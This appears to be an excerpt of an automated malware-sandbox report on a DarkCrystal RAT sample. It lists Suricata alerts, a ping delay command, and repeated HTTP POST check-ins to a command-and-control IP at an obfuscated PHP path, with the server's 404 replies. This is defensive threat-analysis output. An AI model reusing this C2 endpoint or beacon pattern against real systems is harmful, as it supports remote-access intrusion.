Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAB20B6h, 32_2_00007FFD9BAB1EAE
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAC20B6h, 37_2_00007FFD9BAC1EAE
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAA20B6h, 42_2_00007FFD9BA90862
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAC20B6h, 47_2_00007FFD9BAC1EAE
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAC20B6h, 52_2_00007FFD9BAC1EAE
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAE20B6h57_2_00007FFD9BAD0862
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAA20B6h63_2_00007FFD9BAA1EAE

                                    Networking

                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49827 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49868 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49743 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49780 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49907 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49945 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50010 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50016 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50015 -> 206.188.197.24:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 206.188.197.24Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:05 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:29 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:15 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:33:22 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 17:33:28 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
